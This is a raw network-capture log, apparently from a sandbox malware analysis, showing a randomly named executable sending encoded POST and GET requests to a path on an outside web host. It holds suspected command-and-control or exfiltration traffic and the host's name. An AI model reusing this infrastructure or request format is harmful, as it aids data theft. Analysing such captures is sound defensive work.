                                                            Jul 3, 2024 17:37:59.969660044 CEST1262INData Raw: 34 65 37 0d 0a d1 ba 01 40 b6 9a e6 df 9f 97 a2 94 17 4b b1 7d 8d f3 91 52 ca eb 4a 04 2b 0c 36 ac 76 0a 2d e5 68 ad c5 42 2a 9e 08 89 d0 09 69 67 77 91 fb 84 99 cd cd 0a a2 1a b5 7d c4 1a 95 56 4d 12 31 de 35 b4 74 6c c8 cc ef 5e 99 90 a9 07 41
                                                            Data Ascii: 4e7@K}RJ+6v-hB*igw}VM15tl^A;]28V*;NT!+w CU!FlPV.1d}F(^sP}E+T;%PX~:4sWLIMREkLZ"#A-9k/;Ng
                                                            Jul 3, 2024 17:37:59.969681025 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.11.2049796103.120.176.124807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:01.880491972 CEST1131OUTPOST /n8dl/ HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.vintagewins.com
                                                            Referer: http://www.vintagewins.com/n8dl/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 49 41 65 63 39 4b 32 6f 6e 48 73 68 61 4e 4e 56 7a 46 57 76 36 4c 77 2b 65 71 79 54 4b 65 55 4a 35 65 4f 64 79 71 34 41 4f 75 5a 51 6e 47 76 46 71 6b 74 42 6e 65 44 45 34 38 4f 58 45 38 59 69 6b 77 6c 7a 77 4e 52 39 42 2f 52 41 63 64 50 6c 78 38 72 68 79 4d 73 79 2b 76 2f 31 45 70 50 69 35 6c 6d 65 43 76 6d 2b 64 77 2f 4d 6c 6b 66 39 39 71 56 74 6d 52 47 41 66 4d 7a 71 68 38 4f 6a 50 4f 4d 5a 47 55 72 47 79 32 59 49 58 33 36 61 4c 6a 46 4a 39 65 6d 5a 48 6c 58 52 4e 6c 66 37 55 64 56 4f 51 79 66 54 4a 41 4f 58 75 36 63 47 6b 43 32 63 48 6f 77 38 68 6d 58 73 6b 2b 70 2b 55 63 68 7a 65 56 31 45 57 62 47 4d 6b 45 54 74 50 76 79 71 35 55 4d 73 30 42 6a 36 4e 66 4e 2f 52 63 32 57 4c 59 2b 43 48 50 48 74 62 41 7a 6a 36 6a 49 41 74 6f 70 45 42 68 76 72 61 7a 41 6f 2f 64 57 6a 31 6d 55 2b 30 50 66 35 6a 7a 7a 42 38 6b 59 38 68 4b 50 54 43 55 37 38 76 44 56 59 79 76 74 47 30 38 75 53 4a 39 4f 4d 32 76 51 50 55 38 72 35 6c 6f 52 4e 52 75 46 6d 4e 68 34 48 59 2f 36 33 6d 4b 50 63 66 6e 33 39 56 48 63 [TRUNCATED]
                                                            Data Ascii: vX=IAec9K2onHshaNNVzFWv6Lw+eqyTKeUJ5eOdyq4AOuZQnGvFqktBneDE48OXE8YikwlzwNR9B/RAcdPlx8rhyMsy+v/1EpPi5lmeCvm+dw/Mlkf99qVtmRGAfMzqh8OjPOMZGUrGy2YIX36aLjFJ9emZHlXRNlf7UdVOQyfTJAOXu6cGkC2cHow8hmXsk+p+UchzeV1EWbGMkETtPvyq5UMs0Bj6NfN/Rc2WLY+CHPHtbAzj6jIAtopEBhvrazAo/dWj1mU+0Pf5jzzB8kY8hKPTCU78vDVYyvtG08uSJ9OM2vQPU8r5loRNRuFmNh4HY/63mKPcfn39VHc4Bx4u3YWifUPK8vRFVlVONUCiXS77j2jHIi/wfVAlzs7y+0sN1rY6xlaDOgKX87WTQlWXvYKw4HSK9GTMi9Ej9f9sfGrzH5AZ6NYvtuQow97ma1t+Z4X/Wux8QU6rPtqJjl1krhBxNgwg25854y5Eczi95YKz69sPVXpLqGMrHyoIwJGKU47KqMi7w8HzpOa1/aO0Hg0=
                                                            Jul 3, 2024 17:38:02.954888105 CEST1289INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            content-encoding: br
                                                            vary: Accept-Encoding
                                                            date: Wed, 03 Jul 2024 15:38:02 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 64 37 63 0d 0a d0 66 23 a2 a2 f5 43 22 8a f9 00 68 a4 2c 9c bf 3f 42 86 b9 ff 96 a9 7f 8e 2f 27 4c 67 64 48 10 92 ed ac 72 49 db bf 2c 5b 94 e9 60 f4 24 93 20 d0 87 e7 6d 54 6d 36 c3 fe f9 bc 94 be e4 64 46 92 0b c6 29 af 6f 86 e2 65 3d a1 f8 0c 6c 49 f9 bf fd be 9d 8e 58 0c 54 d3 90 48 9c 4e 93 34 f3 66 d6 1f e2 be 62 f3 e6 8e ac a8 fc 5d cc 56 4c 20 89 67 22 f9 2f 62 92 a8 94 b0 11 5a 63 1b 5b a7 9f 25 2c 18 b5 7d 81 aa 53 91 91 63 b0 23 d7 a0 92 e3 ba a2 58 81 56 44 09 70 ff 38 7b bb c3 de f5 5e d5 bd a2 e0 f3 3f 7f 07 b4 f5 21 7f 49 bf 78 b0 b6 bb e8 df ec 74 4c 80 8a fe 0f 3c 75 3b cc eb 1e 14 4d 38 01 28 6b e4 1f d5 03 29 36 22 08 f2 a7 ef de f2 64 b4 03 b5 c4 f4 e2 9c f5 af 24 82 53 74 88 a1 b5 0e de b8 7d ce 5d 3f 74 32 c4 ae 38 b5 be 58 c2 9d 9e f5 dd 56 9b d7 8d 3d 07 eb 51 77 70 b4 3e cd f1 7f 2d a7 de c5 c1 c8 61 37 e0 78 1a b4 e8 e0 f1 17 dd 01 f1 01 49 37 5b 8b cc de dc af 96 cb 0d 81 67 da 4e b3 7e 52 e5 6f 11 c3 36 60 5a 84 b6 a1 45 af 4f b9 ed 75 07 f9 ff c0 27 84 63 35 03 8d 36 0b [TRUNCATED]
                                                            Data Ascii: d7cf#C"h,?B/'LgdHrI,[`$ mTm6dF)oe=lIXTHN4fb]VL g"/bZc[%,}Sc#XVDp8{^?!IxtL<u;M8(k)6"d$St}]?t28XV=Qwp>-a7xI7[gN~Ro6`ZEOu'c56R<Y4>s|nrIv!t`C@6"I6ICsWM|djR/CI~D?rqGg%)2b6W8@^h}"#FG+&H(Cx"XYu]NwiEgm7CaD:Fj7Y1h y.C^m4t[/_Du+o7a_kc)p,f!u|<HH6naGg5&SB3jc=?O)u2~ dh}g3Ca8M,u` Px>l("~i?$+:yQ\lsR|_#z\>dm;BFFET/eH`jXC@)yBthvht:Nx~m}zBUY6~uz}{|YQ'lZ:5uXOI,;?m^f{]u5u7u
                                                            Jul 3, 2024 17:38:02.954901934 CEST1289INData Raw: 31 df 84 12 70 ed b8 6b 29 df 44 83 51 38 e0 13 1b 5a 3f 4d bd 6f cc ea b6 8e 81 ec b6 cb 2d 75 1e b4 5d c4 27 2c 01 96 31 3f b8 2d fe a0 23 89 8a ee 7d 33 f6 bf 73 68 e8 5c e1 79 80 d0 92 bf 43 7c 85 f8 b5 0b 5b ed 7e 37 61 80 2c 4b e0 5a 62 7d
                                                            Data Ascii: 1pk)DQ8Z?Mo-u]',1?-#}3sh\yC|[~7a,KZb}B"y8vi38[X")ZE{#UCx*{iptg=(aB6xT,z5hbhm_j>'xVEJd Q%L((h!y)ntd
                                                            Jul 3, 2024 17:38:02.954924107 CEST1256INData Raw: f0 de c7 91 af 03 7e 0b c4 4c 26 d7 ea a8 9f 63 3e 4b 9e 63 80 f7 6d 6f 39 c6 78 89 a7 d2 8d 29 ae c7 98 94 3a 36 24 ee e6 b4 c6 ae 40 fd 81 5d 58 db 31 4e 58 a6 be bb 38 64 d3 a0 48 83 5c 01 7d c4 32 f5 17 b6 16 3d a3 88 a9 80 89 3e 56 e4 b9 52
                                                            Data Ascii: ~L&c>Kcmo9x):6$@]X1NX8dH\}2=>VRfNQEP=P#kZC"E +t-(|u2AB!9%qh{,8MIG:<JZdo[6cS,jq8-1(H?[FBA3}hLqs
                                                            Jul 3, 2024 17:38:02.960083961 CEST1289INData Raw: 38 34 65 0d 0a 40 01 01 40 4e 53 ad b7 b6 3c fe b3 0c 1c 58 e7 50 cd a5 ad bc a5 55 63 41 4b 23 71 72 14 49 14 5b 4e bb ff b5 d4 b3 30 75 92 f6 ee e5 54 8d ae 51 f3 41 04 69 73 29 72 88 66 fe fe e3 10 82 43 59 d9 a8 56 69 66 e7 b7 c2 45 48 19 59
                                                            Data Ascii: 84e@@NS<XPUcAK#qrI[N0uTQAis)rfCYVifEHYeJx1'nX)92ibqmXMSAo_f=H+Z~0~gxgTIj,1>h7x0|jgs<|a\.{Mdw
                                                            Jul 3, 2024 17:38:02.960196018 CEST844INData Raw: 81 44 e4 93 74 0c 56 25 38 95 2e c9 20 92 09 4b c1 67 68 25 ce 45 9c fa 43 db fb f5 3d f1 47 f9 10 2b 35 1e eb a5 9a a7 fe 64 d5 4d b3 94 78 ad 58 d3 ab 4d 51 69 a7 a7 65 16 db 64 31 5c 01 b1 57 41 db 35 d0 b1 a4 f5 4d f4 43 e8 e8 ce 41 38 e8 fa
                                                            Data Ascii: DtV%8. Kgh%EC=G+5dMxXMQied1\WA5MCA8M=nG]Xz?z0F)V4cp0/Fr]tj_*qi*p1!K??[e,A!<FPL=vk/?0*&`q7l-\D
                                                            Jul 3, 2024 17:38:03.007447958 CEST1123INData Raw: 34 35 63 0d 0a 40 02 01 40 ae a9 3a cb cb c4 91 f9 8d 6c a1 a4 93 52 da 98 c3 e6 2d 71 01 9e 43 e0 76 35 d6 4a 24 35 a6 13 ed 90 48 ab 7b 82 4a 12 8f a2 c9 ce de ad a1 9e b4 69 13 6d f9 23 35 de e3 f1 43 e4 43 7b 42 69 7c 8c fc df b3 25 49 bd 38
                                                            Data Ascii: 45c@@:lR-qCv5J$5H{Jim#5CC{Bi|%I8~pJ"'bz=a7 J`FwYv]!Hpt].-1*,nI$4@ao\uvN^D?+U{2\:LK.vSH|
                                                            Jul 3, 2024 17:38:03.022207022 CEST1262INData Raw: 34 65 37 0d 0a d1 ba 01 40 b6 9a e6 df 9f 97 a2 94 17 4b b1 7d 8d f3 91 52 ca eb 4a 04 2b 0c 36 ac 76 0a 2d e5 68 ad c5 42 2a 9e 08 89 d0 09 69 67 77 91 fb 84 99 cd cd 0a a2 1a b5 7d c4 1a 95 56 4d 12 31 de 35 b4 74 6c c8 cc ef 5e 99 90 a9 07 41
                                                            Data Ascii: 4e7@K}RJ+6v-hB*igw}VM15tl^A;]28V*;NT!+w CU!FlPV.1d}F(^sP}E+T;%PX~:4sWLIMREkLZ"#A-9k/;Ng
                                                            Jul 3, 2024 17:38:03.022217989 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.11.2049797103.120.176.124807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:04.789894104 CEST2578OUTPOST /n8dl/ HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.vintagewins.com
                                                            Referer: http://www.vintagewins.com/n8dl/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 49 41 65 63 39 4b 32 6f 6e 48 73 68 61 4e 4e 56 7a 46 57 76 36 4c 77 2b 65 71 79 54 4b 65 55 4a 35 65 4f 64 79 71 34 41 4f 75 52 51 67 77 54 46 74 7a 78 42 6b 65 44 45 30 63 4f 57 45 38 59 2f 6b 77 74 33 77 4e 63 47 42 38 70 41 64 4b 72 6c 78 70 2f 68 6b 63 73 7a 37 76 2f 33 41 70 50 32 35 6c 72 58 43 73 62 44 64 44 6a 4d 6b 6b 76 39 71 74 68 75 35 52 47 4f 66 4d 7a 75 71 63 4f 52 50 50 63 53 47 55 58 47 79 30 38 49 5a 6d 47 61 49 30 5a 4a 30 75 6d 61 4a 46 58 53 57 56 66 6e 55 5a 39 61 51 79 66 6c 4a 45 32 58 75 36 38 47 6c 44 32 44 4a 6f 77 38 6f 47 58 76 67 2b 74 36 55 63 74 37 65 57 70 45 57 63 43 4d 69 55 54 74 4a 4f 79 70 2b 30 4e 6c 6a 78 6a 74 48 2f 4a 33 52 63 6a 6e 4c 5a 4b 43 48 2f 54 74 61 7a 62 6a 70 32 38 41 7a 59 70 47 63 52 76 30 52 54 41 6b 2f 64 47 4a 31 6d 31 44 30 4e 54 35 79 6d 6e 42 35 42 30 37 68 71 50 56 62 6b 37 70 72 44 59 58 79 76 64 61 30 38 76 50 4a 2f 69 4d 78 62 73 50 56 34 2b 76 6f 59 52 4b 58 75 46 33 43 42 6b 64 59 2f 6d 46 6d 4b 58 4d 66 6b 62 39 61 48 63 [TRUNCATED]
                                                            Data Ascii: vX=IAec9K2onHshaNNVzFWv6Lw+eqyTKeUJ5eOdyq4AOuRQgwTFtzxBkeDE0cOWE8Y/kwt3wNcGB8pAdKrlxp/hkcsz7v/3ApP25lrXCsbDdDjMkkv9qthu5RGOfMzuqcORPPcSGUXGy08IZmGaI0ZJ0umaJFXSWVfnUZ9aQyflJE2Xu68GlD2DJow8oGXvg+t6Uct7eWpEWcCMiUTtJOyp+0NljxjtH/J3RcjnLZKCH/Ttazbjp28AzYpGcRv0RTAk/dGJ1m1D0NT5ymnB5B07hqPVbk7prDYXyvda08vPJ/iMxbsPV4+voYRKXuF3CBkdY/mFmKXMfkb9aHc4KyQv9oWpAkONj/RWVlItNRiUXh/7jCHHMy/za1A5q87w60sN1rVBxlGDORiX6LmTS3+Xg4Ky4HS59Gf/i89C9fMxfFHzGoQZ5MYs9uQt6d7xUURpZ47nWuhCTn+rIpOJpF1nuBB2Kgw2y5hm4y08czWt5fOz7YcMFmdc738Vby1u2uu0eabrlK+XsLj9u+P8ia2SaFuHgj33oo5UsewGN2WnW+u1N/k+wF6XInVWI0OjleM7Jg0howJGvvTzhqc/UlVEfP35JrZdKiQ1KGztyt7+ZT3H5ZZ5kYVEOVAej98CzMSLH2ZjvZ+6t3piHJbGjGj/t/RAfkT+vx5/r2gFihJ8ZRPqNNWzuEyrF3DR4vSsByL0Xx27MVAM5kIjZI+Keit+mV4yzVj+dYp8g1epWJbDXG4BnbX4ddROoCyse3H6yTCaDKLI47Sh0KWK2uNSm93Gg+A1fGe9Uzjk0O4vdJxxZi9Ol9O89CV74lHwlpBwirUPpj8nvhTsM6WlRImPvjY0UMcWlGjTWZNpExK9LMTqANxddu1d5k9WJz70FNKDRHpjHbIgfedYI0nJfSHpEgA0mP6/jrvjOYWHey9HTChmODdrWdNzNdPuowQWTpvxaKM2Kbjs8CRIqMKhk3YSfaEckU/61mfyZZdS7ZiopVvmPxsROYR3/ [TRUNCATED]
                                                            Jul 3, 2024 17:38:04.789916992 CEST3867OUTData Raw: 72 4c 63 70 6a 65 67 57 55 31 62 54 51 79 50 42 43 65 77 6f 6a 2b 4b 37 36 70 51 38 2f 58 2b 37 32 6d 48 33 33 45 55 2b 4b 68 55 41 77 52 34 73 52 6e 76 46 43 70 67 6d 6f 58 72 4c 37 56 61 34 62 63 47 74 65 6d 4a 6b 6e 67 4f 72 64 68 57 6a 71 69
                                                            Data Ascii: rLcpjegWU1bTQyPBCewoj+K76pQ8/X+72mH33EU+KhUAwR4sRnvFCpgmoXrL7Va4bcGtemJkngOrdhWjqiTXjH4nw4F3mnl9OcR0olRxJPRzgllxDI0zDLNnw6MFPzNWRZXFV2xKf9jxeo92pYPojyHLrcv9tXY6VRMEeiiAyw+X+Cx5X8UgFJwnKmXwlmX56GLPKUYhQLxmYkPqdloKm78H3jCNtVCZoZ6CnoPfdHhOXmxADDU
                                                            Jul 3, 2024 17:38:04.789993048 CEST6445OUTData Raw: 44 76 4b 2b 68 6f 4d 70 56 7a 77 6f 46 6f 43 30 6e 5a 31 34 4f 43 77 7a 6d 42 75 43 35 49 4a 56 4c 55 47 71 6d 4a 49 6c 73 63 4b 45 39 63 39 32 4b 2f 33 78 74 33 43 67 45 55 39 75 6a 6c 79 73 6c 2b 30 76 50 51 4a 75 55 43 55 4c 78 64 61 6e 32 67
                                                            Data Ascii: DvK+hoMpVzwoFoC0nZ14OCwzmBuC5IJVLUGqmJIlscKE9c92K/3xt3CgEU9ujlysl+0vPQJuUCULxdan2giXOON+Od35mgADzVXsEqlgSgacbryetarqvo8urNHYHS4kROpMHPDqidFtpkJ2cXihxp4lwrRtCy8jglrH5SFwUfK3wZExZcCkHUBu26u1bABTQ0D3oQgwhoHEcjn3Wy76oQR1fCeJqaTUye/pSSEHXydxGpUXNvc
                                                            Jul 3, 2024 17:38:05.140852928 CEST2578OUTData Raw: 4e 68 2f 36 76 4a 4b 42 76 49 52 4a 37 4a 71 48 42 4c 52 65 57 6a 4e 65 73 77 4c 51 2f 46 38 7a 68 4e 6f 37 57 75 4d 51 71 48 6e 69 73 6b 57 4f 42 54 2b 6e 33 62 4c 57 73 70 2b 67 50 33 33 48 45 67 35 38 39 49 6f 68 6a 64 71 7a 41 6c 30 64 63 52
                                                            Data Ascii: Nh/6vJKBvIRJ7JqHBLReWjNeswLQ/F8zhNo7WuMQqHniskWOBT+n3bLWsp+gP33HEg589IohjdqzAl0dcRYKYrHSBEqAntD74//PwLrC2M0+Vuij223MNQZ3vRIZm0n8wPJ3gjcKCkNUsBNx1+66nl2SXJJd/E34ikInZ01k915mRUm9KGYgmzgSsFELhcttuS1JfKmafoJ0KB8smVDH5SZxzHGUzrS8JlFE8Vw0rM+zYCjUroq
                                                            Jul 3, 2024 17:38:05.141386032 CEST2578OUTData Raw: 65 34 53 62 78 6b 69 71 38 72 57 5a 34 41 63 76 50 46 51 2b 69 33 74 59 34 30 75 43 6f 42 6e 62 61 62 56 55 6a 4f 76 39 71 7a 63 5a 44 71 68 71 63 6a 72 42 41 74 45 66 67 50 30 30 68 2b 72 31 62 74 37 52 6a 55 6e 2f 39 55 7a 4a 35 4b 73 53 56 30
                                                            Data Ascii: e4Sbxkiq8rWZ4AcvPFQ+i3tY40uCoBnbabVUjOv9qzcZDqhqcjrBAtEfgP00h+r1bt7RjUn/9UzJ5KsSV06MA0GL0ZAQ10p02Jf4UBwT+EEWb/9ZhuqP++cAsKKnsaK7jWlJtRAzm54mX6Jb0kJfSbaUM4koSqq/Igtlb+zQd+1c6ZVFJgiF9wZxQXb2I7MaEuS5PeLQIgjHMVP8ZqcENSxI5f430kE9XBppG7+0olqMki2knTw
                                                            Jul 3, 2024 17:38:05.141565084 CEST19335OUTData Raw: 6d 79 4c 45 39 70 68 50 32 71 45 30 33 6f 48 4f 36 70 58 43 37 5a 59 79 34 4d 72 66 6a 39 44 4d 67 63 70 47 6a 2f 35 57 53 50 70 2f 46 31 53 4e 58 4f 71 54 54 79 4e 49 6f 31 47 48 4e 6d 76 58 4b 63 77 2f 73 77 68 72 69 53 62 73 33 41 4c 56 63 79
                                                            Data Ascii: myLE9phP2qE03oHO6pXC7ZYy4Mrfj9DMgcpGj/5WSPp/F1SNXOqTTyNIo1GHNmvXKcw/swhriSbs3ALVcymZUE+jblOfncAKsSU00/+Ft+hjSm2eH/CGGifnu7IredBaHnC5Q5Km0BGmpaFjNOUDV/sZPAEqUw4+kFhELPopucQkXCMKybw5RmSAJEWgvYtANvcEvQYNO7HDG6xC/MFPIEDO9KQ6NNkzRr7R3jMseX1/oYlGqk8
                                                            Jul 3, 2024 17:38:05.491476059 CEST2578OUTData Raw: 66 42 2b 5a 49 45 6e 59 64 38 69 78 71 68 4f 4f 65 49 6b 4a 76 62 76 4d 36 53 47 43 41 4c 4e 45 78 62 66 41 45 6c 57 38 7a 2f 6c 6e 6e 7a 46 2b 31 48 50 62 6b 63 4b 53 75 45 61 6f 61 48 78 73 6d 73 41 30 4d 50 6d 4a 6a 47 59 62 67 79 54 70 2b 4d
                                                            Data Ascii: fB+ZIEnYd8ixqhOOeIkJvbvM6SGCALNExbfAElW8z/lnnzF+1HPbkcKSuEaoaHxsmsA0MPmJjGYbgyTp+MnlaLmhfw2pNOp/PavageAWL8VzkSSWFQnhDZwJxqseDqfxTqxvHfvmRQBwqukaF4KuTqARm5y8rFy1XOSDvR7Mkj1KlLYssVYGVek5W5yMurLstPyn9weckVUJQ8qMPHP/jX1aC73hfb6h1DD099aYtZ3D9Tb0Aw5
                                                            Jul 3, 2024 17:38:05.491643906 CEST1289OUTData Raw: 65 55 45 62 6c 70 33 33 52 65 66 54 74 49 6e 46 58 54 51 43 4b 58 72 6f 58 57 6f 74 42 57 70 32 49 32 35 78 58 57 48 5a 35 68 64 70 66 49 30 74 38 4f 6c 30 33 6c 63 71 36 6b 63 6d 4b 64 75 4c 76 5a 2b 63 68 65 37 53 64 6b 67 6a 68 32 42 68 4d 42
                                                            Data Ascii: eUEblp33RefTtInFXTQCKXroXWotBWp2I25xXWHZ5hdpfI0t8Ol03lcq6kcmKduLvZ+che7Sdkgjh2BhMBVqLuu2c1I6N4FasqOW2A1fuxT8Bx12r5dVNbpaVfXhsPcO/jFgQ0dJXj/Fs1JgxXCXD1BDth6nTzlk84qdSyUChbOg2bRH7JHuKRarzbDVTKxHpk6odhVmRC4jlvF1x42wtqFrT0y6oR8SHHXW4QPDbSuaa8KxiyQ
                                                            Jul 3, 2024 17:38:05.491813898 CEST3867OUTData Raw: 49 31 58 55 53 6e 74 30 72 30 44 46 51 78 6f 76 76 46 6f 39 63 64 69 68 72 50 66 38 43 31 35 56 7a 79 69 4f 51 30 59 30 62 52 39 34 63 33 31 36 48 75 53 41 31 36 69 54 6b 74 47 6c 47 69 75 50 63 70 5a 67 53 4c 59 5a 72 66 41 35 34 36 2b 6b 52 6f
                                                            Data Ascii: I1XUSnt0r0DFQxovvFo9cdihrPf8C15VzyiOQ0Y0bR94c316HuSA16iTktGlGiuPcpZgSLYZrfA546+kRo7ktEWowmoFSpucZ2vt/Q+d+59S1V7XQPh0R7oDX6TfhDmRP0PBG4yW5Ifdesq1FyxinD4JWKqE6aL7dNqEovN3ABSsfMv6ojj+E0EF8ySs5XdT8j28njr6b/SBrdNMwUrM5Kt6IA+1V3moLfKWO3YSsagBptdbWOX
                                                            Jul 3, 2024 17:38:05.491983891 CEST1289OUTData Raw: 45 57 4b 4e 6f 55 49 6f 76 36 57 47 51 69 72 39 34 48 2b 4a 57 6b 43 6b 77 71 49 67 62 34 44 61 67 32 46 70 4e 6c 4c 75 56 62 50 43 47 4f 55 4f 58 52 62 6b 32 4f 2b 39 6d 6c 4e 6b 34 4e 58 4b 45 72 52 61 30 66 5a 42 66 59 43 47 43 37 36 50 52 42
                                                            Data Ascii: EWKNoUIov6WGQir94H+JWkCkwqIgb4Dag2FpNlLuVbPCGOUOXRbk2O+9mlNk4NXKErRa0fZBfYCGC76PRBRGjCBaMI9O/7osSk5KbcEiLS9WPEPz7vgmVvNl7/xCeiSxylL8n0pwCi3BfIKH09ZOeZrPd7NqcwqhHupr54bmIyeV+pn9HmxLNXfr0VrWiktLOYCX8sRKK0pO+wtCn/hxWm2h/Qy7WwIl/tYrLA8cHy8RKgwJefw
                                                            Jul 3, 2024 17:38:05.492146969 CEST2578OUTData Raw: 70 47 43 72 76 74 77 43 46 36 30 6b 6c 6c 57 5a 66 55 6c 7a 32 7a 7a 4e 77 4a 37 70 56 43 78 2b 55 37 49 50 6b 43 56 47 33 42 62 42 48 44 31 62 70 71 49 36 41 7a 73 65 30 59 4d 64 55 6b 37 47 44 63 7a 59 6f 4e 4d 30 70 69 49 43 43 44 4d 67 44 35
                                                            Data Ascii: pGCrvtwCF60kllWZfUlz2zzNwJ7pVCx+U7IPkCVG3BbBHD1bpqI6Azse0YMdUk7GDczYoNM0piICCDMgD5L+EBd3WZDJymNpb1cB0kSAv9jyIuaPO6/GO7R19Fa3ShDhyrpR3xzZUr5OHmPAxOp/GhAupnyYs5zgW81UKkgaXOxv60lDgtV4RG35Q1cOfNU0YcrneX2axezGUiIRHh6lFMBTMk4YKRkXaim5oi9dSrVAW7FeRCL
                                                            Jul 3, 2024 17:38:06.407634020 CEST1289INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            content-encoding: br
                                                            vary: Accept-Encoding
                                                            date: Wed, 03 Jul 2024 15:38:06 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 64 37 63 0d 0a d0 66 23 a2 a2 f5 43 22 8a f9 00 68 a4 2c 9c bf 3f 42 86 b9 ff 96 a9 7f 8e 2f 27 4c 67 64 48 10 92 ed ac 72 49 db bf 2c 5b 94 e9 60 f4 24 93 20 d0 87 e7 6d 54 6d 36 c3 fe f9 bc 94 be e4 64 46 92 0b c6 29 af 6f 86 e2 65 3d a1 f8 0c 6c 49 f9 bf fd be 9d 8e 58 0c 54 d3 90 48 9c 4e 93 34 f3 66 d6 1f e2 be 62 f3 e6 8e ac a8 fc 5d cc 56 4c 20 89 67 22 f9 2f 62 92 a8 94 b0 11 5a 63 1b 5b a7 9f 25 2c 18 b5 7d 81 aa 53 91 91 63 b0 23 d7 a0 92 e3 ba a2 58 81 56 44 09 70 ff 38 7b bb c3 de f5 5e d5 bd a2 e0 f3 3f 7f 07 b4 f5 21 7f 49 bf 78 b0 b6 bb e8 df ec 74 4c 80 8a fe 0f 3c 75 3b cc eb 1e 14 4d 38 01 28 6b e4 1f d5 03 29 36 22 08 f2 a7 ef de f2 64 b4 03 b5 c4 f4 e2 9c f5 af 24 82 53 74 88 a1 b5 0e de b8 7d ce 5d 3f 74 32 c4 ae 38 b5 be 58 c2 9d 9e f5 dd 56 9b d7 8d 3d 07 eb 51 77 70 b4 3e cd f1 7f 2d a7 de c5 c1 c8 61 37 e0 78 1a b4 e8 e0 f1 17 dd 01 f1 01 49 37 5b 8b cc de dc af 96 cb 0d 81 67 da 4e b3 7e 52 e5 6f 11 c3 36 60 5a 84 b6 a1 45 af 4f b9 ed 75 07 f9 ff c0 27 84 63 35 03 8d 36 0b [TRUNCATED]
                                                            Data Ascii: d7cf#C"h,?B/'LgdHrI,[`$ mTm6dF)oe=lIXTHN4fb]VL g"/bZc[%,}Sc#XVDp8{^?!IxtL<u;M8(k)6"d$St}]?t28XV=Qwp>-a7xI7[gN~Ro6`ZEOu'c56R<Y4>s|nrIv!t`C@6"I6ICsWM|djR/CI~D?rqGg%)2b6W8@^h}"#FG+&H(Cx"XYu]NwiEgm7CaD:Fj7Y1h y.C^m4t[/_Du+o7a_kc)p,f!u|<HH6naGg5&SB3jc=?O)u2~ dh}g3Ca8M,u` Px>l("~i?$+:yQ\lsR|_#z\>dm;BFFET/eH`jXC@)yBthvht:Nx~m}zBUY6~uz}{|YQ'lZ:5uXOI,;?m^f{]u5u7u


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.11.2049798103.120.176.124807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:07.702914000 CEST523OUTGET /n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.vintagewins.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:08.600579023 CEST470INHTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            x-redirect-by: WordPress
